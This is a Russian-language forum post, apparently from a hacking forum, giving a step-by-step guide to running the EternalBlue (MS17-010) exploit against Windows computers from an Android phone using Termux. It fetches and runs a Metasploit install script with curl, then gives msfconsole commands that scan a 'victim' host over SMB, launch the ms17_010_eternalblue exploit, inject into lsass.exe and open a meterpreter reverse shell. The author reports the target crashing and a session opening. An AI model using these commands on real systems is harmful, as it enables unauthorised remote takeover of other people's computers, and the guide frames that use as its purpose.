Всем привет! Начну с предыстории (нытьё) Я около 2-х 3-х месяцев устанавливал различные эмуляторы дистрибутивов в надежде использовать Eternalblue-Doublepulsar на моём телефоне. И я нашёл способ, и он довольно лёгкий. Сегодня я пошагово обьясню вам, как использовать Eternalblue на вашем телефоне. (Upd: Copy and Paste с различных источников, для использования meterpreter на телефоне) (примерно 700 мб будет занято одной программой termux после установки всех программ)
Скачиваем с Play Market: Termux, busybox, желательно Root explorer (для него нужен root)
Открываем termux и пишем
После установки пишем следующее
и ждём...
После длительной установки пишем
И ждём завершения загрузки metasploit-framework на ваш смартфон.
После можете использовать команду ./msfconsole для открытия metasploit-framework
Далее нам нужно использовать следующие команды для получение доступа к компьютеру жертвы
(Нужен ваш ip (ifconfig в termux) и target ip (я использую Fing))
Допустим у меня 192.168.0.103
А у компа будет 192.168.0.108
P.s. Лично у меня комп выдал синий экран и перезагрузился, после сессия спокойно открылась, только вот shutdown не работал, мб это только у меня.
На этом всё
Открываем termux и пишем
Код:
pkg upgrade
Далее установка...
Need to get xxxx kB of archives.
After this operation, x b of additional disk space will be used
Do you want to continue [Y/n]
Пишем y и enter
Код:
pkg install curl
curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh
После длительной установки пишем
Код:
chmod 777 metasploit.sh
./metasploit.sh
После можете использовать команду ./msfconsole для открытия metasploit-framework
Далее нам нужно использовать следующие команды для получение доступа к компьютеру жертвы
(Нужен ваш ip (ifconfig в termux) и target ip (я использую Fing))
Допустим у меня 192.168.0.103
А у компа будет 192.168.0.108
Код:
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.0.108
run
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.0.108
run
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.0.108
set lhost 192.168.0.103
set targetarchitecture x64
set payload windows/x64/meterpreter/reverse_tcp
set processinject lsass.exe
set maxexploitattemps 1
run
На этом всё